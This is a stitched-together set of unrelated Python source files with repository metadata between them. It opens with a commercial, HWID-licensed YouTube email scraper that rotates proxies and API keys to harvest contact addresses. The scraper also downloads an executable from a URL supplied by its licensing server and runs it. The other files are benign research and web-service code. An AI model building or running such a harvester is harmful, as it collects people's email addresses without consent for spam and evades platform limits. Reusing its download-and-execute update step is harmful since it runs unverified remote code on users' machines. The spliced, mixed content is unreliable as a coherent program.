logger.add(sink=sys.stdout, format='<green>{time:YYYY-MM-DD HH:mm:ss.SSS}</green> | <level>{level: <8}</level> | <level>{message}</level>') re_year = '"publishedAt": "(.*)",' re_onlyyear= r'^(\d+)-' re_email = '(?:[A-Za-z0-9!#$%&\'*+\\/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&\'*+\\/=?^_`{|}~-]+)*|\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])' class Engine(): def __init__(self): check = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID}) if check.status_code == 200: check = json.loads(check.text) if check['status'] == True: hwid_new = check['hwid'] salt = 'ytsoft139392924992491dds' if (hashlib.md5((HWID+salt).encode())).hexdigest() != hwid_new: sys.exit() else: check_v = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID,'version':__version__}).json() if check_v['status']: logger.success(f'Найдена новая версия.. Обновляемся ({check_v["version"]})') with open(f'YTparser-{check_v["version"]}.exe','wb') as file: file.write(requests.get(check_v['url']).content) os.system(f'YTparser-{check_v["version"]}.exe') sys.exit() else: logger.info(f'Ваш HWID: {HWID}') logger.error('У вас нет подписки! Отправьте ваш HWID продавцу') input() sys.exit() else: logger.error('Сервер на тех. Работах. Нажмите любую кнопку!') input() sys.exit() self.apis = self.read_file("API.txt") self.keys = self.read_file("keywords.txt") self.blackwords = self.read_file("blackwords.txt") self.proxys = self.read_file('proxy.txt') self.emails = 0 os.system('title "@wxkssy | Tg bot: @qualityshop24_bot"') num_threads = int(input(Fore.GREEN + '> Enter number of threads: ' + Style.RESET_ALL)) self.videocount = 0 while (True): self.year = input(Fore.GREEN + '> Enter max channel reg-year: ' + Style.RESET_ALL) if self.year.isdigit(): self.year = int(self.year) if (self.year > 2000): break while (True): self.views = input(Fore.GREEN + '> Enter min channel views: ' + Style.RESET_ALL) if self.views.isdigit(): self.views = int(self.views) break while True: self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL) if not '-' in self.subs: self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL) else: self.subs = [int(self.subs.split('-')[0]), int(self.subs.split('-')[1])] if (self.subs[0] < self.subs [1]): break self.blacklist = input(Fore.GREEN + '> Enter blacklist (y/n): ' + Style.RESET_ALL) if self.blacklist.lower() != 'y': self.blackwords = '' logger.info(f'Max Year: {self.year} | Min Views: {self.views} | Subs: {self.subs[0]}-{self.subs[1]}') sleep(1) threads = [] for i in range(num_threads): t = threading.Thread(target=self.process_data) threads.append(t) for t in threads: t.start() threading.Thread(target=self.console_log).start() for t in threads: t.join() logger.info('Данные закончились, завершение...') input("Нажми ENTER, чтобы завершить") def read_file(self,filename): with open(filename, 'r',encoding='utf-8',errors='ignore') as f: return f.read().split('\n') def process_data(self): proxies = { 'http': f'http://{random.choice(self.proxys)}', } while True: try: if self.apis == [] or self.keys == []: break api = random.choice(self.apis) key = random.choice(self.keys) search = VideosSearch(key, limit=50) try: self.keys.remove(str(key)) except: pass videoIds = search.result() while True: try: for videoID in videoIds['result']: description = '' if videoID['descriptionSnippet'] != None: for _ in videoID['descriptionSnippet']: description += _['text'] + ' ' email = re.findall(re_email, description) channelId = videoID['channel']['id'] while True: try: api = random.choice(self.apis) resp = requests.get(f'https://www.googleapis.com/youtube/v3/channels?part=statistics%2Csnippet&maxResults=50&id={channelId}&key={str(api)}',proxies=proxies) if resp.status_code == 200: resp_rez = resp.json()["items"][0] break else: try: self.apis.remove(api) except: pass if self.apis == []: break except: proxies = { 'http': f'http://{random.choice(self.proxys)}', } if self.apis == []: return while True: try: vid = videoID['id'] except: res3 = [] break try: api = random.choice(self.apis) resp = requests.get(f"https://youtube.googleapis.com/youtube/v3/videos?part=snippet&part=contentDetails&part=statistics&id={vid}&key={api}",proxies=proxies) if resp.status_code == 200: res3 = re.findall(re_email, resp.text.replace(r"\n", "")) break else: try: self.apis.remove(api) except: pass if self.apis == []: break except: proxies = { 'http': f'http://{random.choice(self.proxys)}', } if self.apis == []: return yearid = int(resp_rez['snippet']['publishedAt'][:4]) # Количество подписчиков try: subscount = resp_rez["statistics"]["subscriberCount"] except Exception: subscount = 0 try: viewscount = resp_rez["statistics"]["viewCount"] except: viewscount = 0 try: countryId = resp_rez["snippet"]["country"] except Exception: countryId = 'Not' if countryId in self.blackwords: pass else: if res3 != []: if self.year >= int(yearid): if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount): if self.views <= int(viewscount): for mail in res3: self.write_mail(f"emails.txt", mail) if email != []: if self.year >= int(yearid): if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount): if self.views <= int(viewscount): for mail in email: self.write_mail(f"emails.txt", mail) # описание канала try: descriptionCN = resp_rez["snippet"]["description"] except Exception: descriptionCN = '' emailDesc = re.findall(re_email, descriptionCN) if emailDesc != []: if self.year >= int(yearid): if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount): if self.views <= int(viewscount): for mail in emailDesc: self.write_mail(f"emails.txt", mail) self.videocount += 1 try: search.next() videoIds = search.result() except: break nextpage = len(videoIds['result']) if nextpage == 0: break except: pass except: pass def write_mail(self,filename, data): x = self.read_file(filename) with open(filename, 'a+',encoding='utf-8') as f: if data not in x: f.write(str(data) + '\n') self.emails += 1 def console_log(self): while True: os.system('cls' if os.name == 'nt' else 'clear') logger.info(f'ApiKeys: {len(self.apis)} | KeyWords: {len(self.keys)} | Emails: {self.emails} | Video_seen: {self.videocount}') sleep(5) Engine()
basautomaticaly/work
main2-5.py
main2-5.py
py
46,695
python
en
code
0
github-code
6
30609616360
import numpy as np import os import Tools.FilesTool as FilesTool import imblearn.over_sampling as over_sampling class DataSetTool: # 08版的度量补偿 # Mij in Target = (Mij in Target * Mean(Mj in Source)) / Mean(Mj) in Target @staticmethod def metric_compensation(source, target): # 遍历每一个度量属性 for j in range(target.shape[1]): # 计算每个度量属性的均值 metric_mean_source = np.mean(source[:, j]) metric_mean_target = np.mean(target[:, j]) # 遍历每一个样例 for i in range(target.shape[0]): target[i, j] = (target[i, j] * metric_mean_source) / metric_mean_target return target # 17版进行调整的度量补偿 # Mij in Source = (Mij in Source * Mean(Mj in Target)) / Mean(Mj) in Source @staticmethod def metric_compensation_adopt(source, target): # 遍历每一个度量属性 for j in range(source.shape[1]): # 计算每个度量属性的均值 metric_mean_source = np.mean(source[:, j]) metric_mean_target = np.mean(target[:, j]) # 遍历每一个样例 for i in range(source.shape[0]): source[i, j] = (source[i, j] * metric_mean_target) / metric_mean_source return source # 读取文件夹下的所有文件,并返回处理好的数据集 # metrics_num 度量数目(原始数据中除开标签列的列数) # is_sample 是否重采样 # is_normalized 是否数据归一化 @staticmethod def init_data(folder_path, metrics_num, is_sample=True, is_normalized=True): # 获取目录下所有原始文件 files = os.listdir(folder_path) data_list, label_list = [], [] for file in files: # 每一个子文件的真实路径 file_path = folder_path+file # txt文件 if 'txt' == FilesTool.file_type(file) or 'TXT' == FilesTool.file_type(file): # 直接读取文件 data_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=range(0, metrics_num+1)) label_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=metrics_num+1) if is_normalized: # 数据归一化 data_file -= data_file.min() data_file /= data_file.max() label_file -= label_file.min() label_file /= label_file.max() # 加入列表 data_list.append(data_file) label_list.append(label_file) # 重采样 if is_sample: for index in range(len(data_list)): data_list[index], label_list[index] = over_sampling.SMOTE(kind='regular').fit_sample(data_list[index], label_list[index]) return data_list, label_list
ylxieyu/HYDRA
DataSetTool.py
DataSetTool.py
py
3,100
python
en
code
5
github-code
6
70675296187
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations from ..pki.migrate_data import migrate_pki_data class Migration(migrations.Migration): dependencies = [ ('ssl_pki', '0002_default_config'), ] operations = [ migrations.RunPython(migrate_pki_data, migrations.RunPython.noop), ]
ngageoint/exchange
exchange/sslpki/migrations/0001_migrate_pki_data.py
0001_migrate_pki_data.py
py
361
python
en
code
0
github-code
6
71087023548
""" Tests for the server. Before running them, the server database should be restarted. Run as: python server/tests/test_all.py (don't use py.test as it does not pass env variables easily) """ import os import shutil from pathlib import Path from typing import List import pytest from requests.exceptions import HTTPError import numpy as np from src.al_loop import LeadCompound from server.app import WORKSHOP_ORACLES from solutions.task1.random_loop import RandomLoop from src.server_wrapper import FlaskAppClient from rich.console import Console console = Console() PORT = int(os.environ.get("PORT", "5000")) BASE_URL = "http://127.0.0.1:" + str(PORT) BASE_URL = "http://mlinpl23.ngrok.io" TEST_TOKEN_PREFIX = 'test-' # test-0, test-1, ... def test_submitting_compounds_to_workshop_oracles(): """Submits three simple molecules to the server using token test-0, to all workshop oracles.""" client = FlaskAppClient(base_url=BASE_URL) token = TEST_TOKEN_PREFIX + '0' # Example for scoring compounds for oracle in WORKSHOP_ORACLES: compounds = ["CCCCCCCCC", "CCCCCCCC", "CCCCCC=O"] response = client.score_compounds_and_update_leaderboard(compounds, oracle, token) print(response) assert "metrics" in response assert "compound_scores" in response assert "compound_sas_scores" in response def _run_random_exploration(protein, token="test-1", steps=10): """Simple random exploration of ZINC. Should get above >0.5 score on each oracle.""" base_dir = Path("tmp") shutil.rmtree(base_dir, ignore_errors=True) client = FlaskAppClient(base_url=BASE_URL) loop = RandomLoop(base_dir=base_dir, user_token=token, target=protein) all_result: List[LeadCompound] = [] budget_per_step = 100 for step in range(steps): console.print(f"[red]Step {step}[/red]") candidates = loop.propose_candidates(budget_per_step) loop.test_in_lab_and_save(candidates, client=client) result: List[LeadCompound] = loop.load(iteration_id=step) all_result += result all_result_sorted = sorted(all_result, key=lambda x: x.activity, reverse=True) metrics = {"top10": np.mean([x.activity for x in all_result_sorted[:10]]), "top10_synth": np.mean([x.synth_score for x in all_result_sorted[:10]])} console.log(metrics) return metrics def test_random_exploration_gets_reasonable_score(): for protein in [ 'GSK3β', 'DRD2_server', 'JNK3']: console.log("Testing: " + protein) metrics = _run_random_exploration(protein=protein) assert metrics['top10'] > 0.1, "Random search should identify reasonable compounds" def test_leaderboard_ordering_and_user_names(): _run_random_exploration('DRD2_server', 'test-2', steps=1) _run_random_exploration('DRD2_server', 'test-3', steps=1) client = FlaskAppClient(base_url=BASE_URL) all_results = client.all_results() users = [r['user'] for r in all_results] print(users) assert 'user-2' in users assert 'user-3' in users all_proteins = ['DRD2', 'JNK3', 'GSK3β'] sums = [sum([all_results[0]['metrics'][p + "_top_10"] for p in all_proteins]) for r in all_results] assert sums[0] == max(sums), "First result in the leaderboard should be the maximum sum of top10 scores" def test_call_limits(): base_dir = Path("tmp") token = 'test-10' shutil.rmtree(base_dir, ignore_errors=True) loop = RandomLoop(base_dir=base_dir, user_token=token, target='DRD2') client = FlaskAppClient(base_url=BASE_URL) # exhaust limit candidates = loop.propose_candidates(1000) loop.test_in_lab_and_save(candidates, client=client) # run one time more candidates = loop.propose_candidates(100) with pytest.raises(RuntimeError): client.score_compounds_and_update_leaderboard([c.smiles for c in candidates], user_token=token, oracle_name='DRD2') def test_get_all_scores(): base_dir = Path("tmp") token = 'test-40' shutil.rmtree(base_dir, ignore_errors=True) loop = RandomLoop(base_dir=base_dir, user_token=token, target='GSK3β_server') client = FlaskAppClient(base_url=BASE_URL) # exhaust limit candidates = loop.propose_candidates(100) candidates = loop.test_in_lab_and_save(candidates, client=client) # run one time more console.log(client.all_scores(token)) assert len(client.all_scores(token)['compound_sas_scores']['GSK3β']) == len(candidates) assert len(client.all_scores(token)['compound_scores']['GSK3β']) == len(candidates) if __name__ == "__main__": test_submitting_compounds_to_workshop_oracles() test_random_exploration_gets_reasonable_score() test_leaderboard_ordering_and_user_names() test_call_limits() test_get_all_scores() console.log("[green] Tests passed [/green]")
molecule-one/mlinpl-23-workshops
server/tests/test_all.py
test_all.py
py
4,995
python
en
code
1
github-code
6
13954857960
par=[] for i in range(100): par.append(i) def find(u): if u==par[u]: return u par[u]=find(par[u]) # Path Compression, 경로 압축 return par[u] def merge(u,v): u,v=find(u),find(v) if u==v: return par[u]=v # without Union-By-Rank merge(1,5) merge(2,5) merge(4,1) print(find(5)==find(4)) print(find(0)==find(1))
MilkClouds/SCSC-2019
서로소 집합.py
서로소 집합.py
py
359
python
en
code
0
github-code
6
38093772023
from time import sleep from HW_03.my_decorator import DecorTimeCrit @DecorTimeCrit(critical_time=0.45) class Test: def method_1(self): print('slow method start') sleep(1) print('slow method finish') def method_2(self): print('fast method start') sleep(0.1) print('fast method finish') def execute_time_method_check(): t = Test() t.method_1() t.method_2() if __name__ == '__main__': execute_time_method_check() # slow method start # slow method finish # WARNING! method_1 slow. Time = ??? sec. # fast method start # fast method finish
alisa-moto/python-adnanced
HW_03/class_for_decorator.py
class_for_decorator.py
py
616
python
en
code
0
github-code
6
4769452267
#!/usr/bin/env python import sys import os def deserialize_anno(parts): # Frame name formatted as <task ID><6 digit frame ID> frame_name = parts[0] track_id = parts[1] x = float(parts[2]) y = float(parts[3]) box_width = float(parts[4]) box_height = float(parts[5]) class_id = parts[7] #print(frame_name, track_id, box_left, box_top, box_width, box_height, class_id) return frame_name, track_id, x, y, box_width, box_height, class_id
Salmon-Computer-Vision/salmon-computer-vision
utils/utils.py
utils.py
py
455
python
en
code
4
github-code
6
859362304
from __future__ import division from vistrails.core.modules.vistrails_module import Module from ..common import get_numpy from ..read.read_numpy import NumPyArray class WriteNumPy(Module): """Writes a list as a Numpy file. NumPy can use one of two schemes: either 'plain' binary arrays, i.e. just the binary representation of the data format (in this case you must specify the exact format to get the original data back), or the NPY format, i.e. .npy files that know what the actual structure of the array is. """ _input_ports = [ ('array', '(org.vistrails.vistrails.basic:List)'), ('datatype', '(org.vistrails.vistrails.basic:String)', {'entry_types': "['enum']", 'values': "[%r]" % NumPyArray.FORMATS})] _output_ports = [('file', '(org.vistrails.vistrails.basic:File)')] def compute(self): numpy = get_numpy() array = self.get_input('array') if not isinstance(array, numpy.ndarray): array = numpy.array(array) dtype = NumPyArray.get_format(self.get_input('datatype')) if dtype is NumPyArray.NPY_FMT: fileobj = self.interpreter.filePool.create_file(suffix='.npy') fname = fileobj.name # Numpy's ".NPY" format numpy.save(fname, array) else: fileobj = self.interpreter.filePool.create_file(suffix='.dat') fname = fileobj.name # Numpy's plain binary format array.astype(dtype).tofile(fname) self.set_output('file', fileobj) _modules = [WriteNumPy] ############################################################################### import unittest class WriteNumpyTestCase(unittest.TestCase): def test_raw_numpy(self): """Uses WriteNumPy to write an array in raw format. """ import array from vistrails.tests.utils import execute, intercept_result from ..identifiers import identifier with intercept_result(WriteNumPy, 'file') as results: self.assertFalse(execute([ ('write|WriteNumPy', identifier, [ ('array', [('List', '[0, 1, 258, 6758]')]), ('datatype', [('String', 'uint32')]), ]), ])) self.assertEqual(len(results), 1) expected_bytes = [0, 0, 0, 0, 1, 0, 0, 0, 2, 1, 0, 0, 102, 26, 0, 0] with open(results[0].name, 'rb') as fp: self.assertEqual(fp.read(), array.array('B', expected_bytes).tostring()) def test_npy_numpy(self): """Uses WriteNumPy to write an array in .NPY format. """ import numpy from vistrails.tests.utils import execute, intercept_result from ..identifiers import identifier with intercept_result(WriteNumPy, 'file') as results: self.assertFalse(execute([ ('write|WriteNumPy', identifier, [ ('array', [('List', '[0, 1, 258, 6758]')]), ('datatype', [('String', 'npy')]), ]), ])) self.assertEqual(len(results), 1) self.assertEqual(list(numpy.load(results[0].name)), [0, 1, 258, 6758]) def test_write_read(self): """Uses WriteNumPy and NumPyArray to write then read an array. """ from vistrails.tests.utils import execute, intercept_result from ..identifiers import identifier for dtype in ('npy', 'uint32'): with intercept_result(NumPyArray, 'value') as results: self.assertFalse(execute([ ('write|WriteNumPy', identifier, [ ('array', [('List', '[0, 1, 258, 6758]')]), ('datatype', [('String', dtype)]), ]), ('read|NumPyArray', identifier, [ ('datatype', [('String', dtype)]), ]), ], [ (0, 'file', 1, 'file'), ])) self.assertEqual(len(results), 1) self.assertEqual(list(results[0]), [0, 1, 258, 6758])
VisTrails/VisTrails
vistrails/packages/tabledata/write/write_numpy.py
write_numpy.py
py
4,325
python
en
code
100
github-code
6
10844685453
from database import db from flask import request from middleware.auth import login_required, admin_only from models.guild import Guild from typing import Dict, Optional, Tuple def check_request(req: request, id_only: Optional[bool] = False) -> int | Tuple[int, str, bool] | Tuple[Dict[str, str], int]: # Check request body guild_name = '' guild_manage_threads = False try: guild_id = req.json['id'] if not isinstance(guild_id, int): raise ValueError('id must be an integer') if not id_only: guild_name = req.json.get('name', guild_name) guild_manage_threads = req.json.get('manage_threads', guild_manage_threads) if 'name' in req.json and not isinstance(guild_name, str): raise ValueError('name must be a string') if 'name' in req.json and not 0 < len(guild_name) < 256: raise ValueError('name must be between 0 to 256 characters long') if 'manage_threads' in req.json and not isinstance(guild_manage_threads, bool): raise ValueError('manage_threads must be a boolean') except KeyError as e: return { 'success': False, 'error': f'Missing key in request body: {e}' }, 400 except ValueError as e: return { 'success': False, 'error': f'Bad value: {e}' }, 400 else: if id_only: return guild_id else: return guild_id, guild_name, guild_manage_threads @admin_only def add_guild(): # Check request body check_result = check_request(request) if isinstance(check_result[0], dict): return check_result guild_id, guild_name, guild_manage_threads = check_result # Check if guild is already in DB guild = Guild.query.get(guild_id) if guild is not None: return { 'success': False, 'error': 'Guild already exists' }, 409 # Create guild guild = Guild( id=guild_id, name=guild_name, manage_threads=guild_manage_threads ) # Add to DB db.session.add(guild) db.session.commit() return { 'success': True } @admin_only def update_guild(): # Check request body check_result = check_request(request) if isinstance(check_result[0], dict): return check_result guild_id, guild_name, guild_manage_threads = check_result # Check if guild is already in DB guild = Guild.query.get(guild_id) if guild is None: return { 'success': False, 'error': f'Guild {guild_id} does not exist' }, 404 # Update existing guild if 'name' in request.json: guild.name = guild_name if 'manage_threads' in request.json: guild.manage_threads = guild_manage_threads # Commit db.session.commit() return { 'success': True }, 200 @admin_only def delete_guild(): # Check request body check_result = check_request(request, id_only=True) if isinstance(check_result, tuple) and isinstance(check_result[0], dict): return check_result guild_id = check_result # Check if guild is in DB guild = Guild.query.get(guild_id) if guild is not None: # Delete user db.session.delete(guild) db.session.commit() return { 'success': True }, 200 @login_required def get_guild(): # Check request body check_result = check_request(request, id_only=True) if isinstance(check_result, tuple) and isinstance(check_result[0], dict): return check_result guild_id = check_result # Check if guild is in DB guild = Guild.query.get(guild_id) if guild is None: return { 'success': False, 'error': 'Guild not found' }, 404 # Return guild data return { 'success': True, 'guild': { 'name': guild.name, 'manage_threads': guild.manage_threads } }, 200
jareddantis-bots/rico-backend
api/guilds.py
guilds.py
py
4,053
python
en
code
0
github-code
6
29456781892
from six.moves.urllib import parse import tarfile from lxml import etree from atrope import exception SPECS = { 'http://www.vmware.com/interfaces/specifications/vmdk.html': 'vmdk', 'https://people.gnome.org/~markmc/qcow-image-format.html': 'qcow', } def _get_tarfile(ova): if not tarfile.is_tarfile(ova): raise exception.CannotOpenFile(reason="not a valid 'tar' file") return tarfile.open(ova) def extract_file(ova, filename): tf = _get_tarfile(ova) fd = tf.extractfile(filename) return fd def get_disk_name(ovf): """Get the disk format and file name from a OVF descriptor.""" root = etree.fromstring(ovf) ovf_ns = root.nsmap['ovf'] id_attr = '{%s}id' % ovf_ns href_attr = '{%s}href' % ovf_ns files = {f.get(id_attr): f.get(href_attr) for f in root.findall('ovf:References/ovf:File', root.nsmap)} # we do not care about more than one disk disk = root.find('ovf:DiskSection/ovf:Disk', root.nsmap) if disk is not None: format_attr = '{%s}format' % ovf_ns fileref_attr = '{%s}fileRef' % ovf_ns ovf_format = disk.get(format_attr) if not ovf_format: raise Exception("Expecting some format!") (format_url, _) = parse.urldefrag(ovf_format) try: disk_format = SPECS[format_url] except KeyError: raise Exception("Unknown format!") try: disk_file = files[disk.get(fileref_attr)] except KeyError: raise Exception("Unknown disk!") return (disk_format, disk_file) return None, None def get_ovf(ova): """Return an OVF descriptor as stored in an OVA file, if any.""" tf = _get_tarfile(ova) ovf = None for name in tf.getnames(): if name.endswith(".ovf"): ovf = tf.extractfile(name).read() break if ovf is None: raise exception.InvalidOVAFile(reason="cannot find a .ovf descriptor") return ovf
alvarolopez/atrope
atrope/ovf.py
ovf.py
py
1,986
python
en
code
2
github-code
6
30137635
#!/usr/bin/python # -*- coding: utf-8 -*- import requests import json url = "http://localhost:6332" headers = {'content-type': 'application/json'} def get_result(payload): response = requests.post( url, data=json.dumps(payload), headers=headers).json() return json.dumps(response) def get_all_address(): payload = { "method": "getalladdress", "params": {}, "jsonrpc": "2.0", "id": 1, } content = json.loads(get_result(payload)) content=content["result"] address_arr=[] for (v) in content: address=v.split("-")[2] address_arr.append(address) return json.dumps(address_arr) def get_balance(): payload = { "method": "getbalance", "params": {}, "jsonrpc": "2.0", "id": 1, } content = json.loads(get_result(payload)) pending=(content["result"]["base"]["pending"])/1000000 stable=(content["result"]["base"]["stable"])/1000000 balance=pending+stable return json.dumps({"balance":balance,"pending":pending,"stable":stable}) def check_address(address): payload = { "method": "checkAddress", "params": [address], "jsonrpc": "2.0", "id": 1, } return get_result(payload) def pay(address,amount,msg): if not msg: payload = { "method": "sendtoaddress", "params": [address,amount*1000000], "jsonrpc": "2.0", "id": 1, } else: payload = { "method": "sendtoaddresswithmessage", "params": [address,amount*1000000,msg], "jsonrpc": "2.0", "id": 1, } return get_result(payload)
taozywu/token_light
rpc.py
rpc.py
py
1,701
python
en
code
0
github-code
6
25240137017
n, f = map(int, input().split()) ciclo = list(map(int, input().split())) PrimeiroDia = 1 UltimoDia = 10**8 while PrimeiroDia < UltimoDia: aux = int((PrimeiroDia + UltimoDia) / 2) total = 0 for i in range(len(ciclo)): total = total + (aux // ciclo[i]) if total >= f: UltimoDia = aux else: PrimeiroDia = aux + 1 print(UltimoDia)
MateusFerreiraMachado/Programas_Python
capsulas.py
capsulas.py
py
376
python
pt
code
0
github-code
6
27161595951
# Written by RF while True: Q=float(input("What number would you like to square? ")) H=float(input("How many times would you like to square it? ")) S=((Q)**H) print("The", H, "square is", S) while True: answer = str(input('Anything else? (y/n): ')) if answer in ('y', 'n'): break print("invalid input.") if answer == 'y': continue else: print("Godspeed") break
GustavMH29/Python
Code/Math/Equations/Square.py
Square.py
py
450
python
en
code
0
github-code
6
39687962974
# Time:O(n) # Space:O(n) class Solution: def productExceptSelf(self, nums: List[int]) -> List[int]: left_prod = [1] for num in nums: left_prod.append(left_prod[-1]*num) right_prod = [1] for num in reversed(nums): right_prod.insert(0, right_prod[0]*num) op = [] for i in range(1, len(nums)+1): op.append(left_prod[i-1]*right_prod[i]) return op
cmattey/leetcode_problems
30DayChallenge_April/april_15_product_except_self.py
april_15_product_except_self.py
py
446
python
en
code
4
github-code
6
73815074426
from user.models import User from rest_framework import exceptions def get_user(username): user = None if "@" in username: try: user = User.objects.get(email=username) except User.DoesNotExist: user = User.objects.create( username=username, email=username ) elif username.isdigit(): try: user = User.objects.get(phone_no=username) except User.DoesNotExist: user = User.objects.create( username=username, phone_no=username ) else: try: user = User.objects.get(username=username) except User.DoesNotExist: raise exceptions.NotFound("User matching username was not found!") return user
Python-Crew/base_drf
auth_user/services.py
services.py
py
815
python
en
code
1
github-code
6
9758869645
from app import app, db import json from tests.lib import login def test_get_products(): client = app.test_client() response = client.get("/api/products") assert len(response.json) == 27 assert response.status_code == 200 def test_get_single_product(): client = app.test_client() response = client.get("/api/products/1") assert response.json["product_name"] == "White Trainers" assert response.status_code == 200
hannahakhtar/golden-shoes
server/tests/test_products.py
test_products.py
py
454
python
en
code
0
github-code
6
33387732761
import numpy as np from sklearn.tree import DecisionTreeClassifier from .sampler import FeatureSampler, ObjectSampler class Bagger: def __init__(self, base_estimator, object_sampler, feature_sampler, n_estimators=10, **params): """ n_estimators : int number of base estimators base_estimator : class class for base_estimator with fit(), predict() and predict_proba() methods feature_sampler : instance of FeatureSampler object_sampler : instance of ObjectSampler n_estimators : int number of base_estimators params : kwargs params for base_estimator initialization """ self.n_estimators = n_estimators self.base_estimator = base_estimator self.feature_sampler = feature_sampler self.object_sampler = object_sampler self.estimators = [] self.indices = [] self.params = params def fit(self, X, y): """ for i in range(self.n_estimators): 1) select random objects and answers for train 2) select random indices of features for current estimator 3) fit base_estimator (don't forget to remain only selected features) 4) save base_estimator (self.estimators) and feature indices (self.indices) NOTE that self.base_estimator is class and you should init it with self.base_estimator(**self.params) before fitting """ self.estimators = [] self.indices = [] for i in range(self.n_estimators): X_sampled, y_sampled = self.object_sampler.sample(X, y) feature_indices = self.feature_sampler.sample_indices(X.shape[1]) estimator = self.base_estimator(**self.params) estimator.fit(X_sampled[:, feature_indices], y_sampled) self.estimators.append(estimator) self.indices.append(feature_indices) return self def predict_proba(self, X): """ Returns ------- probas : numpy ndarrays of shape (n_objects, n_classes) Calculate mean value of all probas from base_estimators Don't forget, that each estimator has its own feature indices for prediction """ if not (0 < len(self.estimators) == len(self.indices)): raise RuntimeError('Bagger is not fitted', (len(self.estimators), len(self.indices))) predicts = [] for estimator, feature_indices in zip(self.estimators, self.indices): predict = estimator.predict_proba(X[:, feature_indices]) predicts.append(predict) return np.mean(np.array(predicts), axis=0) def predict(self, X): """ Returns ------- predictions : numpy ndarrays of shape (n_objects, ) """ return np.argmax(self.predict_proba(X), axis=1) class RandomForestClassifier(Bagger): def __init__(self, n_estimators=30, max_objects_samples=0.9, max_features_samples=0.8, max_depth=None, min_samples_leaf=1, random_state=None, **params): base_estimator = DecisionTreeClassifier object_sampler = ObjectSampler(max_samples=max_objects_samples, random_state=random_state) feature_sampler = FeatureSampler(max_samples=max_features_samples, random_state=random_state) super().__init__( base_estimator=base_estimator, object_sampler=object_sampler, feature_sampler=feature_sampler, n_estimators=n_estimators, max_depth=max_depth, min_samples_leaf=min_samples_leaf, **params, )
TotalChest/MLprograms
RandomForest/random_forest.py
random_forest.py
py
3,665
python
en
code
0
github-code
6
35544157808
import calendar from datetime import datetime class Util: DATE_FORMAT = '%Y-%m-%d' def get_month_start_date(datetime): return datetime.date().replace(day=1) def get_month_end_date(datetime): year = datetime.year month = datetime.month monthrange = calendar.monthrange(year, month) return datetime.date().replace(day=monthrange[1]) class CalendarEvent: def __init__(self, date, event): self.date = date self.event = event class HTMLEventCalendar(calendar.HTMLCalendar): # CSS classes for the day <td>s cssclasses = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"] # CSS classes for the day <th>s cssclasses_weekday_head = cssclasses # CSS class for the days before and after current month cssclass_noday = "noday" # CSS class for the month's head cssclass_month_head = "month" # CSS class for the month cssclass_month = "month" # CSS class for the year's table head cssclass_year_head = "year" # CSS class for the whole year table cssclass_year = "year" cssclass_event = "calendar-event" cssclass_day_number = "day-number" def __init__(self, firstweekday=calendar.MONDAY, events={}): super().__init__(firstweekday) self.events = events def get_event(self, day, month, year): date = datetime.strptime("{}-{}-{}".format(year, month, day), Util.DATE_FORMAT) date_string = date.strftime(Util.DATE_FORMAT) return self.events.get(date_string, '') def formatday(self, day, weekday, themonth=None, theyear=None): """ Return a day as a table cell. """ if day == 0: # day outside month return '<td class="%s">&nbsp;</td>' % self.cssclass_noday else: event = self.get_event(day, themonth, theyear) html = """ <td class="%s"> <div class="%s">%s</div> <div class="%s">%d</div> </td>""" % (self.cssclasses[weekday], self.cssclass_event, event, self.cssclass_day_number, day) return html def formatweek(self, theweek, themonth=None, theyear=None): """ Return a complete week as a table row. """ s = ''.join(self.formatday(d, wd, themonth, theyear) for (d, wd) in theweek) return '<tr>%s</tr>' % s def formatmonth(self, theyear, themonth, withyear=True): """ Return a formatted month as a table. """ v = [] a = v.append a('<table border="0" cellpadding="0" cellspacing="0" class="%s">' % ( self.cssclass_month)) a('\n') a(self.formatmonthname(theyear, themonth, withyear=withyear)) a('\n') a(self.formatweekheader()) a('\n') for week in self.monthdays2calendar(theyear, themonth): a(self.formatweek(week, theyear=theyear, themonth=themonth)) a('\n') a('</table>') a('\n') return ''.join(v)
bluepostit/di-python-2019
daily-exercises/week9/visitors/calendar.py
calendar.py
py
3,141
python
en
code
1
github-code
6
5118772924
from flask import current_app, Blueprint,request, jsonify from vpnresolve import VPNResolve import json import logging logger = logging.getLogger( "ucn_logger" ) ios_api = Blueprint('ios_api', __name__) @ios_api.route("/viz/ios/log", methods=['POST']) def log(): vpnres = VPNResolve(current_app.config["CIDR"], {"db":current_app.config["MONGODB"],"collection":current_app.config["VPNLOGSCOLLECTION"],"host":current_app.config["MONGOHOST"], "port":current_app.config["MONGOPORT"]}) host = vpnres.clientip(request) if host is None: return jsonify(success="False") logger.debug("saving ios data for host %s", host) data = request.get_json(force=False) logger.debug("received data for host %s" % host) #shove the processes into the table in bulk! success= True if 'processes' in data: logger.debug("saving ios process data for host %s", host) success = current_app.config["datadb"].bulk_insert_processes(host,data['processes']) if success: logger.debug("sucessfully saved ios process data for host %s", host) else: logger.error("failed to save ios process data") if 'network' in data: logger.debug("saving ios network for host %s", host) success = success and current_app.config["datadb"].insert_network_data(host, data['network']) if success: logger.debug("sucessfully saved ios network data for host %s", host) else: logger.error("failed to save ios network data") logger.error(data['network']) return jsonify(success= "True" if success else "False")
ucn-eu/ucnviz
